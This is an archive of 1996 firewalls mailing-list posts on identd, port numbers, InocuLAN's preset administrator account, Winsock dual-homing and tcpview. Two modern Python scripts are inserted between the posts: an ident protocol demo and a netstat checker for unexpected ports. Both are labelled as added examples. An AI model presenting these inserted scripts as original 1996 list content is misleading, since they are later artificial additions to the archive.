wrote: > I was told recently that there are several modifications to tcpdump > floating around out there, primarily one that is packaged with a 'video' > utility that will take captured packets and replay them according to time > stamp information (real time playback). Does anyone know of where one > might come up with these modifications and/or additional filters? I > checked ftp.ee.lbl.gov, and the only thing they support is the standard > tcpdump release.
> > Thanks in advance, > > --chris > > %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% > %% Christopher Eastman %% Cable & Wireless, Inc %% > %% MDS Network Engineer %% 1919 Gallows Road %% > %% chris@cwi.net %% Vienna, VA 22182 %% > %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% > > ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Wed Feb 14 20:40:22 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id UAA15119 for firewalls-outgoing; Wed, 14 Feb 1996 20:24:04 -0800 (PST) Received: from bifrost.paladin.com (router.paladin.com [199.3.129.207]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id UAA15105 for ; Wed, 14 Feb 1996 20:23:58 -0800 (PST) Received: (from mail@localhost) by bifrost.paladin.com (8.6.12/8.6.9) id XAA01062; Wed, 14 Feb 1996 23:22:25 -0500 Received: from router.paladin.com(199.3.129.207) by bifrost.paladin.com via smap (V1.3) id sma001060; Wed Feb 14 23:22:11 1996 Date: Wed, 14 Feb 1996 23:22:11 -0500 (EST) From: Chris Woods To: Kyle Amon cc: firewalls@GreatCircle.COM Subject: Re: port 113? In-Reply-To: <9601148243.AA824307224@jabil.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Tue, 13 Feb 1996, Kyle Amon wrote: > Is there any reason (other than the loss of remote user identification > services on my host) that I might _not_ want to disable identd? I think it's one of those "You scratch my back, I'll scratch yours" things. Identd is definitely an "administrator-friendly" protocol. 
Disabling identd will not be directly detrimental to your site, unless you have lots of IRC users and that is a service which your site policy provides. Some IRC channels do not allow users from hosts that do not have identd running properly (or at all). If every site were to disable identd, then many web servers and network-access monitoring tools would be "crippled" wrt logging. Chris Woods cjwoods@paladin.com Systems/Network Administrator vox 617-273-4226 Paladin Computing Solutions, Inc. http://www.paladin.com/ From firewalls-owner Thu Feb 15 01:25:41 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id BAA25592 for firewalls-outgoing; Thu, 15 Feb 1996 01:20:36 -0800 (PST) Received: from icicle.winternet.com (icicle.winternet.com [198.174.169.5]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id BAA25587 for ; Thu, 15 Feb 1996 01:20:31 -0800 (PST) Received: from parka (dufresne@parka.winternet.com [198.174.169.9]) by icicle.winternet.com (8.7.3/8.7.2) with ESMTP id DAA14868 for ; Thu, 15 Feb 1996 03:19:08 -0600 (CST) Received: (from dufresne@localhost) by parka (8.6.12/8.6.12) id DAA08476; Thu, 15 Feb 1996 03:19:08 -0600 Posted-Date: Thu, 15 Feb 1996 03:19:08 -0600 Date: Thu, 15 Feb 1996 03:19:07 -0600 (CST) From: Ron DuFresne To: firewalls@GreatCircle.COM Subject: article, pcweek: InocuLAN leaves NT servers open! Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk et al., PCWEEK, Feb. 12, vol 13 num. 13, page 8: ...While testing InocuLAN 1.01 for an upcoming review, PC Week Labs found that the product's installation routine created an NT administrator-level account for its own use, with a preset password that has no expiration... Creating such an account is not unusual for network operating system product installs and is not ordinarily a problem.
However, the InocuLAN password is unencrypted and could be discovered by anyone with a moderate measure of curiosity and skill... Later, Ron DuFresne ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ "Cutting the space budget really restores my faith in humanity. It eliminates dreams, goals, and ideals and lets us get straight to the business of hate, debauchery, and self-annihilation." -- Johnny Hart ***testing, only testing, and damn good at it too!*** OK, so you're a Ph.D. Just don't touch anything. From firewalls-owner Thu Feb 15 02:31:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id CAA27638 for firewalls-outgoing; Thu, 15 Feb 1996 02:16:12 -0800 (PST) Received: from gate.ggr.co.uk ([193.128.25.10]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id CAA27622 for ; Thu, 15 Feb 1996 02:15:54 -0800 (PST) Received: from mailhub.ggr.co.uk (uk0x07.ggr.co.uk) by gate.ggr.co.uk; Thu, 15 Feb 1996 10:06:22 GMT Received: from ukwit01.ggr.co.uk (ukwit01.ggr.co.uk) by mailhub.ggr.co.uk; Thu, 15 Feb 1996 10:01:27 GMT Received: by ukwit01.ggr.co.uk (8.7.1/imd160294) id KAA26552; Thu, 15 Feb 1996 10:08:31 GMT From: "Lack Mr G M" Message-Id: <9602151008.ZM26550@ukwit01> Date: Thu, 15 Feb 1996 10:08:30 +0000 In-Reply-To: Les Carleton "The Secure Operating Systems Question" (Feb 13, 1:21pm) References: <31208d38.900440@158.152.1.72> X-Mailer: Z-Mail (3.2.0 26oct94 MediaMail) To: les@tracker.demon.co.uk, firewalls@greatcircle.com Subject: Re: The Secure Operating Systems Question Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I've recently had customers coming up more and more with the "Secured > operating system" question. That is ... what is the benefit of having a > specially secured operating system on a machine which no one is going to be > logging in to? Because, if it isn't "Secured" then some people *might* start logging into it! 
> 3) There are no login users (except root, whose access is controlled by a > securid card or other secure password scheme). There is also the possibility of having only a few accounts on it, controlled by this same securid/secure password scheme, and only allowing root access by "/bin/su -" after a successful "personal" login. This adds personal accountability to root access. > The question is ... Is there any benefit in having an MLS or specially secured > operating system on the host or will a standard opsys meeting these criteria > do? Depends on your terminology. Is a Unix system with irrelevant/"dangerous" services removed a "specially secured" OS or a "standard" one? -- ----------- Gordon Lack ----------------- gml4410@ggr.co.uk ------------ The contents of this message *may* reflect my personal opinion. They are *not* intended to reflect those of my employer, or anyone else. From firewalls-owner Thu Feb 15 05:10:21 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id EAA01602 for firewalls-outgoing; Thu, 15 Feb 1996 04:59:57 -0800 (PST) Received: from dialup.oar.net (dialup.oar.net [131.187.1.130]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id EAA01597 for ; Thu, 15 Feb 1996 04:59:53 -0800 (PST) Received: from sun1plus.liebert.com for legg@sun1plus.liebert.com by dialup.oar.net (8.6.10/931123.1402) id HAA21179; Thu, 15 Feb 1996 07:56:01 -0500 Received: from td407 by sun1plus.liebert.com (5.0/SMI-SVR4) id AA12772; Thu, 15 Feb 1996 07:54:44 +0500 From: legg@sun1plus.liebert.com (Jim Legg) Received: by td407 (SMI-8.6) id DAA00975; Thu, 15 Feb 1996 03:02:11 -0500 Date: Thu, 15 Feb 1996 03:02:11 -0500 Message-Id: <199602150802.DAA00975@td407> To: cjwoods@Paladin.COM Subject: Re: port 113?
Cc: firewalls@greatcircle.com X-Sun-Charset: US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > If every site were to disable identd, then many web servers and > network-access monitoring tools would be "crippled" wrt logging. > The reason that I didn't find the ident protocol is that it didn't seem to be implemented with Solaris 2.3 (Correct me if I'm wrong about this.) Also PCs don't run it, including the one that was the target in the original log snippet that I posted. -jim- From firewalls-owner Thu Feb 15 05:41:48 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA02359 for firewalls-outgoing; Thu, 15 Feb 1996 05:27:45 -0800 (PST) Received: from nexus.ptech.com (aegis.ptech.com [165.166.50.2]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id FAA02345 for ; Thu, 15 Feb 1996 05:27:39 -0800 (PST) Received: from felix.ptech.com by nexus.ptech.com (5.x/Piedmont Technology Group) id AA24681; Thu, 15 Feb 1996 08:21:27 -0500 Date: Thu, 15 Feb 1996 08:21:26 -0500 Message-Id: <9602151321.AA24681@nexus.ptech.com> X-Sender: jnb@nexus.ptech.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" To: Pascal.Trouvin@integralis.co.uk, gjose@mecx05.colesmyer.com.au, firewalls@GreatCircle.COM From: Jim Brown Subject: Re: Firewall-1 Version Comparison Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Version 2 also provides firewall-to-firewall encryption ....
At 06:00 PM 2/14/96 +0000, Pascal.Trouvin@integralis.co.uk wrote: > >Attachment Converted: C:\SCRATCH\ATTACH\ReFirewa > > Firewall-1 from Checkpoint > > version 1 had only filtering capabilities > > version 2 implements some user identification/authentication > schemes, address translation > > > regards > > pascal.trouvin@integralis.co.uk > From firewalls-owner Thu Feb 15 05:57:55 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id FAA03013 for firewalls-outgoing; Thu, 15 Feb 1996 05:52:51 -0800 (PST) Received: from habanero.jmu.edu (habanero.jmu.edu [134.126.70.210]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id FAA02999; Thu, 15 Feb 1996 05:52:46 -0800 (PST) Message-Id: <199602151352.FAA02999@miles.greatcircle.com> Received: by habanero.jmu.edu (1.37.109.16/16.2) id AA045452282; Thu, 15 Feb 1996 08:51:22 -0500 Date: Thu, 15 Feb 1996 08:51:22 -0500 From: gary flynn To: firewalls-owner@GreatCircle.COM, firewalls@GreatCircle.COM Subject: Re: list of port numbers above 255 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Hi all > > Can anyone tell me if there is a FAQ or RFC detailing port numbers above 255? > I have already downloaded RFC 1010. Is this the latest RFC on assigned numbers? > > Thanks > RFC1700 is the latest one I know about.
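The ident (RFC 1413, TCP port 113) exchange that the port 113 thread above turns on, as an added example: this is not code from the list, from any identd, or from the web servers and monitoring tools Chris Woods mentions. Both ends of the protocol are written as pure functions (the querier builds the request and parses the reply; a simulated identd answers from a connection table) so they can be exercised offline, and `main()` runs them over a loopback socket. The connection table is constructed; the port pair and user name are the worked example in RFC 1413 itself. The practitioner's caveat is built into the parser: the user name is whatever the remote host chooses to claim, so it is treated as untrusted input (length-capped, no control characters) before it is considered fit for a log line, and the read is bounded so a hostile identd cannot stream forever.

```python
# Added example for the port 113 thread: not code from the list, from any
# identd, or from the web servers mentioned.  Both sides of an RFC 1413
# exchange are pure functions so they can be exercised offline; main() runs
# them over a loopback socket.  The connection table is constructed; the
# port pair and user name are the RFC 1413 worked example.
import re
import socket
import socketserver
import threading

IDENT_PORT = 113        # RFC 1413 assigned port
MAX_REPLY_LEN = 1000    # RFC 1413: a reply is at most 1000 characters
MAX_USERID_LEN = 512    # RFC 1413: a user id is at most 512 octets

# Stand-in for the kernel's TCP table on the host running identd:
# (its local port, remote port) -> (operating system, owning user).
FAKE_CONNECTIONS = {(6193, 23): ("UNIX", "stjohns")}

_PORT_PAIR = re.compile(r"^\s*(\d{1,5})\s*,\s*(\d{1,5})\s*$")


def _port(text):
    n = int(text)
    if not 1 <= n <= 65535:
        raise ValueError("port out of range: %r" % text)
    return n


def build_query(port_on_ident_host, port_on_querier):
    """Querier side: '<port-on-server>, <port-on-client>' CRLF, where the
    'server' is the host being asked (it owns the first port)."""
    return ("%d, %d\r\n" % (_port(port_on_ident_host),
                            _port(port_on_querier))).encode("ascii")


def identd_reply(request_line, connections=FAKE_CONNECTIONS):
    """identd side: answer one request line from the connection table."""
    m = _PORT_PAIR.match(request_line.rstrip("\r\n"))
    if not m:
        return "0, 0 : ERROR : INVALID-PORT\r\n"   # unparseable: nothing to echo
    try:
        a, b = _port(m.group(1)), _port(m.group(2))
    except ValueError:
        return "%s, %s : ERROR : INVALID-PORT\r\n" % (m.group(1), m.group(2))
    entry = connections.get((a, b))
    if entry is None:
        return "%d, %d : ERROR : NO-USER\r\n" % (a, b)
    return "%d, %d : USERID : %s : %s\r\n" % (a, b, entry[0], entry[1])


def parse_reply(raw):
    """Querier side: parse a reply into a dict, or raise ValueError.
    The user id is only *claimed* by the remote host, so it is untrusted
    input: length-capped and free of control characters before it is
    considered fit for a log line."""
    if len(raw) > MAX_REPLY_LEN:
        raise ValueError("reply too long")
    parts = raw.rstrip("\r\n").split(":", 2)
    if len(parts) != 3:
        raise ValueError("malformed reply: %r" % raw)
    m = _PORT_PAIR.match(parts[0])
    if not m:
        raise ValueError("bad port pair: %r" % parts[0])
    result = {"server_port": _port(m.group(1)), "client_port": _port(m.group(2))}
    status = parts[1].strip().upper()
    if status == "ERROR":
        result.update(status="ERROR", error=parts[2].strip())
        return result
    if status != "USERID":
        raise ValueError("unknown response type: %r" % status)
    opsys_charset, sep, userid = parts[2].partition(":")  # user id may hold ':'
    userid = userid.strip()
    if (not sep or not userid or len(userid) > MAX_USERID_LEN
            or any(ord(c) < 32 or ord(c) == 127 for c in userid)):
        raise ValueError("unacceptable user id in %r" % raw)
    result.update(status="USERID", userid=userid,
                  opsys=opsys_charset.split(",")[0].strip())  # drop ", charset"
    return result


def ident_lookup(host, port_on_host, our_port, ident_port=IDENT_PORT, timeout=5.0):
    """Ask `host` who owns its end of the TCP connection host:port_on_host
    <-> us:our_port.  Bounded read: a hostile identd cannot stream forever."""
    with socket.create_connection((host, ident_port), timeout=timeout) as s:
        s.sendall(build_query(port_on_host, our_port))
        data = b""
        while b"\n" not in data and len(data) <= MAX_REPLY_LEN:
            chunk = s.recv(256)
            if not chunk:
                break
            data += chunk
    return parse_reply(data.decode("ascii", "replace"))


class _IdentHandler(socketserver.StreamRequestHandler):
    """Minimal identd for the loopback demo."""
    def handle(self):
        line = self.rfile.readline(MAX_REPLY_LEN).decode("ascii", "replace")
        self.wfile.write(identd_reply(line).encode("ascii"))


if __name__ == "__main__":
    srv = socketserver.TCPServer(("127.0.0.1", 0), _IdentHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:  # we are the telnet server (port 23); the peer's end is port 6193
        print(ident_lookup("127.0.0.1", 6193, 23, ident_port=srv.server_address[1]))
    finally:
        srv.shutdown()
        srv.server_close()
```

Run stand-alone it prints the parsed `USERID` reply for the RFC example pair. Note what the protocol does and does not give a web server or monitor that logs it: an audit hint supplied by the peer's own administrator, useful exactly as far as that administrator is trustworthy, never an authentication of the user.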
From firewalls-owner Thu Feb 15 06:31:01 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA03827 for firewalls-outgoing; Thu, 15 Feb 1996 06:19:02 -0800 (PST) Received: from lint.cisco.com (lint.cisco.com [171.68.235.77]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA03822 for ; Thu, 15 Feb 1996 06:18:59 -0800 (PST) Received: from pferguso-pc.cisco.com (c1robo6.cisco.com [171.68.13.6]) by lint.cisco.com (8.6.10/CISCO.SERVER.1.1) with SMTP id GAA21368; Thu, 15 Feb 1996 06:16:50 -0800 Message-Id: <199602151416.GAA21368@lint.cisco.com> X-Sender: pferguso@lint.cisco.com X-Mailer: Windows Eudora Pro Version 2.1.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 15 Feb 1996 09:17:33 -0500 To: "Jeffry L'H. Tank" From: Paul Ferguson Subject: Re: list of port numbers above 255 Cc: firewalls@GreatCircle.COM Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Did you try RFC-1700 [Assigned Numbers]? - paul At 07:32 AM 2/14/96 -0500, Jeffry L'H. Tank wrote: >Hi all > >Can anyone tell me if there is a FAQ or RFC detailing port numbers above 255? >I have already downloaded RFC 1010. Is this the latest RFC on assigned numbers? > >Thanks > >Jeffry L'H. Tank >sysop VSE Corp. Internet Server > -- Paul Ferguson || || Consulting Engineering || || Reston, Virginia USA |||| |||| tel: +1.703.716.9538 ..:||||||:..:||||||:..
e-mail: pferguso@cisco.com c i s c o S y s t e m s From firewalls-owner Thu Feb 15 06:40:40 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04170 for firewalls-outgoing; Thu, 15 Feb 1996 06:28:48 -0800 (PST) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with SMTP id GAA04165 for ; Thu, 15 Feb 1996 06:28:42 -0800 (PST) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id JAA28421; Thu, 15 Feb 1996 09:31:39 -0500 From: Adam Shostack Message-Id: <199602151431.JAA28421@homeport.org> Subject: Re: Private FTP / Mail To: JGambetti@msmail.radisys.com (Jesse Gambetti) Date: Thu, 15 Feb 1996 09:31:39 -0500 (EST) Cc: firewalls@GreatCircle.COM In-Reply-To: <31224B01@msmail.radisys.com> from "Jesse Gambetti" at Feb 14, 96 12:49:00 pm X-Mailer: ELM [version 2.4 PL24 ME8b] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Jesse Gambetti wrote: | I'm interested in what security risks a private FTP server for our employees | and sending MS Mail via internet might present. | | As far as the FTP server we would need to set it up in a way that our | employees could copy files onto it just as if it were a netware drive. Which | might mean running NFS on the servers. If the FTP server is internal only, you don't have a problem. If it's also exposed to the internet, things get hairy, because you need IPX on it. This means that you have a multiprotocol box somewhere, and that machine needs to be tied down very tightly to prevent it from being a route into your IPX network from the IP side. (Note that the server doesn't need to be the multiprotocol box; you can have some other (preferably small, single purpose) machine act as a Netware server, and run a process on the FTP server that occasionally pulls files off of the Netware machine.)
As far as sending MS mail via the internet, you have the standard confidentiality problems and integrity/authentication problems, and you also have the possibility that someone will insert MS Macro viruses into your mail stream. (Sigh. Does Microsoft get kickbacks from the anti-virus industry?) -- "It is seldom that liberty of any kind is lost all at once." -Hume From firewalls-owner Thu Feb 15 06:56:51 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-951222-1) id GAA04298 for firewalls-outgoing; Thu, 15 Feb 1996 06:31:15 -0800 (PST) Received: from dropit.pgh.net (dropit.pgh.net [206.210.64.12]) by miles.greatcircle.com (8.7.1/Miles-951221-1) with ESMTP id GAA04283 for ; Thu, 15 Feb 1996 06:30:48 -0800 (PST) Received: from amanue.UUCP (uucp@localhost) by dropit.pgh.net (8.7.3/PGH.NET-01) with UUCP id JAA13455 for GreatCircle.COM!Firewalls; Thu, 15 Feb 1996 09:13:08 -0500 (EST) Received: by amanue.pgh.net (Smail3.1.28.1 #2) id m0tn43j-000FYhC; Thu, 15 Feb 96 08:49 WET Message-Id: From: jr@amanue.pgh.net (Jim Rosenberg) Subject: Re: MS-Windows PC as an email gateway To: Firewalls@GreatCircle.COM Date: Thu, 15 Feb 1996 08:49:18 -40962758 (EST) In-Reply-To: <199602150900.BAA24679@miles.greatcircle.com> from "firewalls-digest-owner@GreatCircle.COM" at Feb 15, 96 01:00:24 am X-Mailer: ELM [version 2.4 PL20] Content-Type: text Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Rachel Rosencrantz writes: > > My company is looking at a quick way of getting on the Internet without > > investing in a lot of hardware and engineering effort. One idea, which > > has management interested, is to work with a local ISP to get a dedicated > > line, either ISDN or 28.8, to tie a PC running MS-Windows or MS-Windows > > NT to the Internet. > > > > This PC would be an FTP server and WWW server. This PC would only be > > connected to our office network _after_ it had been disconnected from the > > ISP connection. Thus, no need for a fire wall. 
(So we can transfer files > > back and forth.) > > How do you intend to prevent the PC from being connected to the internet > and to the internal net at the same time? Physical disconnection? (How > do you prevent someone from physically connecting to both nets at once? the > two?) Single card? How are you going to prevent interface > mess-ups and too much inconvenience from reconfiguring net links? I'm not an expert on this subject, and probably shouldn't be posting here, but am hoping to further frame the questions, since I've also thought about this issue. In case anybody is thinking this only affects a small number of people, think again. You have a firewall? Do you have *any* MS-Windows clients? Do any of those machines have modems? Any adventurous users on any of these machines? These days, somebody can get a free floppy in the mail, double-click on an icon and voila, they're connected to the Net. So the issue of how to deal with connection to both the Net and one's internal network can *not* just be dealt with by a firewall, because anyone with a PPP connection and a modem is a potential back door around the firewall. (Unless I badly misunderstand ...) So back to the original question. It seems to me the simplest way to deal with this issue is using alternate Winsocks. The setup is a little tricky, but doable. You have one Winsock that knows how to talk to the internal LAN. It is set up for Ethernet (or whatever you're using) and *has no PPP* set up. The other Winsock has PPP set up and no Ethernet. I'm pretty sure Trumpet can be set up this way, and probably other versions of Winsock too. This isn't as safe as physically disconnecting from the Ethernet while talking over PPP, but gives a measure of safety that is probably good enough. There is the obvious issue here that you are trusting your PC user not to tamper with the dual Winsock setup. But beyond this, can anyone comment on any *technical* weaknesses in a dual Winsock approach?
> Can time delay attacks be set up on the PC?

The multiple Winsock solution obviously doesn't defend against this one. The scariest thing about a PC connected to the Net sometimes and one's internal net other times is the possibility of a Trojan that will wait 'til it's got a Net connection and then connect to bad guys.

--
Jim Rosenberg                      http://www.well.com/user/jer/
CIS: 71515,124   WELL: jer   Internet: jr@amanue.pgh.net

From firewalls-owner Thu Feb 15 07:24:03 1996
From: Frederick M Avolio
To: Michael Brown, jeromie
Cc: firewalls, sengle
Subject: RE: Gauntlet 3.1 Packet Filter?
Date: Thu, 15 Feb 1996 09:11:04 -0500
Message-Id: <2.2.16.19960215141104.21bf779a@pop.trusted.com>

The Gauntlet Internet Firewall supports more than this. See the web page http://www.tis.com/docs/NetSec/NetSec.html for a jump off point to latest press release, glossie, and functional summary.

This stream is starting to read like a marketing event.

Fred

> My understanding of Gauntlet (please help me out and correct me) is the
> proxies it supports are: Telnet, FTP, SMTP, NNTP, HTTP, X11, and gopher.
> The NSC product is not directly competing for internet firewall business, but
> more for Secure VPN applications over the Internet, Frame Relay, SMDS, any
> public based network you need to ensure your traffic is kept confidential.

From firewalls-owner Thu Feb 15 07:25:33 1996
From: Jeffry Tank
To: firewalls@greatcircle.com
Subject: winsock security
Date: Thu, 15 Feb 1996 09:20:25 -0500
Message-Id: <9602151420.AA07250@vse1>

> Date: Thu, 15 Feb 1996 07:18:44 -0500
> To: firewall
> From: Jeffry Tank
> Subject: winsock security
>
> Hi all
>
> I currently am running a network with the following configuration:
> A Sparc II server running SunOS 4.1.3, which is connected to a Livingston IRX firewall router to the Internet.
> The Sun is connected to a Novell 4.1 server through the AUI port on the concentrator with thinnet,
> the Novell server is connected to the PC workstations with 10-baseT. The PC's are running WFWG with networking disabled. The Novell network is talking IPX only, both the PC's and server have no IP services
> running. The PC's run clients for web, ftp, mail, gopher, etc, using winsock (Trumpet in this case), using
> LSL, OPKODI, PKTODI, and WINPKT shims.
>
> Question: Assuming that the Novell server and PC's are not running any IP based services, are they at risk of penetration thru the Sun server? I know that NCSA Telnet for DOS runs a FTP server in background unless disabled (it was not well documented!) and am wondering if anyone knows of this situation using any winsock, or winsock clients, freeware, shareware, or commercial?
>
> Thanks
>
> Jeff Tank
> Sysop, VSE Corp. Internet Server
>

From firewalls-owner Thu Feb 15 07:51:04 1996
From: "Ralph C. Wolman"
To: Ron DuFresne
Cc: firewalls@greatcircle.com
Subject: Re: article, pcweek: InocuLAN leaves NT servers open!
Date: Thu, 15 Feb 1996 09:21:53 -0500 (EST)

This is *not* meant to start a mail war... and I'm sure starting a discussion about this is not appropriate for this group. However, since we have to put up with enough misinformation and partial information in the press, you should at least be fair and give the list *all* of the information.

What you say is certainly printed in the article. However, there is an important additional piece of information you have left out.

And I quote,

"A version of InocuLAN that will prompt administrators for a domain password on installation will be available this week, according to Cheyenne officials.

"Cheyenne, of Roslyn Heights, N.Y., can be reached at (800) 243-9462 or at http://www.cheyenne.com."

Cheers,
Ralph

p.s.
- I have no affiliation with Cheyenne or PC Week.

-----
Ralph Wolman
Netrix Corporation
13595 Dulles Technology Drive
Herndon, VA. 22071

On Thu, 15 Feb 1996, Ron DuFresne wrote:

> et. al.,
>
> PCWEEK, feb., 12, vol 13 num. 13, page 8:
>
> ...While testing InocuLAN 1.01 for an upcoming review, PC Week Labs found
> that the product's installation routine created an NT administrator-level
> account for its own use, with a preset password that has no expiration...
> Creating such an account is not unusual for network operating system
> product installs and is not ordinarily a problem. However, the InocuLAN
> password is unencrypted and could be discovered by anyone with a moderate
> measure of curiosity and skill...
>
> Later,
>
> Ron DuFresne
> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
> "Cutting the space budget really restores my faith in humanity. It
> eliminates dreams, goals, and ideals and lets us get straight to the
> business of hate, debauchery, and self-annihilation." -- Johnny Hart
> ***testing, only testing, and damn good at it too!***
> OK, so you're a Ph.D. Just don't touch anything.

From firewalls-owner Thu Feb 15 07:52:35 1996
From: David Worthington
Date: Thu, 15 Feb 1996 14:45:30 GMT
Message-Id: <199602151445.OAA13738@mercury.chadwyck.co.uk>
To: firewalls@GreatCircle.COM
Subject: Port 838

Does anyone know what tcp port 838 is used for?
In the following output from netstat, our print server (called "sunserver" for the purposes of this example) has a service listening on port 838. The PC (some-pc) is running Windows95:

sunserver % netstat -a | grep some-pc
tcp        0      0  sunserver.838          some-pc.19166          ESTABLISHED
tcp        0      0  sunserver.838          some-pc.2643           ESTABLISHED
tcp        0      0  sunserver.838          some-pc.3210           ESTABLISHED

There is no mention of port 838 in the Assigned Numbers RFC1700. Is this the latest Assigned Numbers RFC?

Thanks for your help.

--
David Worthington (dave@chadwyck.co.uk)
Systems Administrator
Chadwyck-Healey Ltd
The Quorum, Barnwell Road
Cambridge CB5 8SW, England
Tel: (01223) 215512
Fax: (01223) 215513

From firewalls-owner Thu Feb 15 07:54:34 1996
From: "R. M. DuFresne"
To: "firewalls@GreatCircle.COM"
Subject: tcpdump motif frontend pointers...
Date: Thu, 15 Feb 1996 08:51:47 -0600 (CST)
Organization: MINN. Information Systems

et. al.,

since there has been so much interest in this package I'm posting the lsm for it to the list.
Enjoy folks:

Begin3
Title:          tcpview
Version:        1.0
Entered-date:   18MAY95
Description:    A Motif-based TCP/IP protocol analyzer
Keywords:       ethernet tcpdump Motif
Author:         martinh@cac.washington.edu (Martin Hunt)
                tcpdump@ee.lbl.gov (Steve McCann)
Maintained-by:  fillod@iutserveur.univ-lyon1.fr (Stephane FILLOD)
Primary-site:   iutserveur.univ-lyon1.fr /pub/linux/tcpview
                291kB tcpview-1.0.tar.gz
                756 tcpview-1.0.lsm
Alternate-site: sunsite.unc.edu /pub/Linux/system/Network/management
Original-site:  ftp.cac.washington.edu /pub/noc-tools/tcpview
                484kB tcpview-1.0.tar.Z
                3kB tcpview-1.0.tar.readme
                1.3MB tcpview-1.0.dec.tar.Z
                1.8MB tcpview-1.0.sun.tar.Z
Platforms:      Sun/OS, Ultrix, BSD, Linux, Motif required !
Copying-policy: BSD, University of Washington
End

If anyone can't get to it you are welcome to e-mail me and I'll send it to you direct.

Later,

Ron DuFresne
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
admin & senior consultant: darkstar.sysinfo.com   http://darkstar.sysinfo.com
"Cutting the space budget really restores my faith in humanity. It
eliminates dreams, goals, and ideals and lets us get straight to the
business of hate, debauchery, and self-annihilation." -- Johnny Hart
***testing, only testing, and damn good at it too!***
OK, so you're a Ph.D. Just don't touch anything.
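David Worthington's port 838 question and Jeff Tank's worry about clients that quietly run a server in the background come down to the same administrative check: which local TCP ports are open that nobody on the site expected? The script below is an added example, not code from either poster. It parses the BSD/SunOS-style netstat -a layout quoted in the port 838 message (the sample rows and the expected-services table are constructed, not captured data) and reports every port that is listening, or serving a remote peer from a privileged port, without being in the expected table.

```python
from collections import defaultdict

# Constructed sample in the BSD/SunOS "netstat -a" layout quoted in the thread
# (host.port endpoints, service names for well-known ports); not captured data.
SAMPLE_NETSTAT = """\
Proto Recv-Q Send-Q  Local Address      Foreign Address    (state)
tcp        0      0  sunserver.838      some-pc.19166      ESTABLISHED
tcp        0      0  sunserver.838      some-pc.2643       ESTABLISHED
tcp        0      0  sunserver.838      some-pc.3210       ESTABLISHED
tcp        0      0  sunserver.smtp     mailhub.1042       ESTABLISHED
tcp        0      0  sunserver.1041     ftp.mirror.ftp     ESTABLISHED
tcp        0      0  *.838              *.*                LISTEN
tcp        0      0  *.1234             *.*                LISTEN
tcp        0      0  *.ftp              *.*                LISTEN
"""

# Constructed stand-in for the /etc/services entries this site deliberately runs.
EXPECTED_SERVICES = {"ftp": 21, "telnet": 23, "smtp": 25, "sunrpc": 111}


def local_port(endpoint, names=EXPECTED_SERVICES):
    """Port of a netstat 'host.port' endpoint: int for numeric or known
    service-name ports, otherwise the raw name token."""
    port = endpoint.rpartition(".")[2]
    if port.isdigit():
        return int(port)
    return names.get(port, port)


def find_unexpected_ports(netstat_output, expected=EXPECTED_SERVICES):
    """Map each unexpected local TCP port to whether something LISTENs on it
    and which remote endpoints are currently connected to it."""
    expected_ports = set(expected.values())
    findings = defaultdict(lambda: {"listening": False, "peers": []})
    for line in netstat_output.splitlines():
        fields = line.split()
        if len(fields) < 6 or fields[0] != "tcp":
            continue                     # header, udp and unix-socket rows
        port, remote, state = local_port(fields[3]), fields[4], fields[5]
        if port in expected_ports:
            continue
        if state == "LISTEN":
            findings[port]["listening"] = True
        elif isinstance(port, int) and port >= 1024:
            continue                     # ephemeral side of an outbound connection
        else:
            findings[port]["peers"].append(remote)  # privileged port serving a peer
    return dict(findings)
```

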